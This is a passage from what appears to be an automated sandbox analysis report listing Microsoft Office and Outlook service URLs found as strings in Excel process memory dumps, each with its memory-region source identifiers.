Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.com0-
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.comsyz
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies#
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://dev.cortak
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/hP
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://devnull.onenote.com
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comBearer
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comed
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comt
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://directory.services.
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/#
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v12
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/yT
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmln
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/Url$
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE String found in binary or memory: https://entity.osi.office.net/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://entity.osi.office.net/t
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
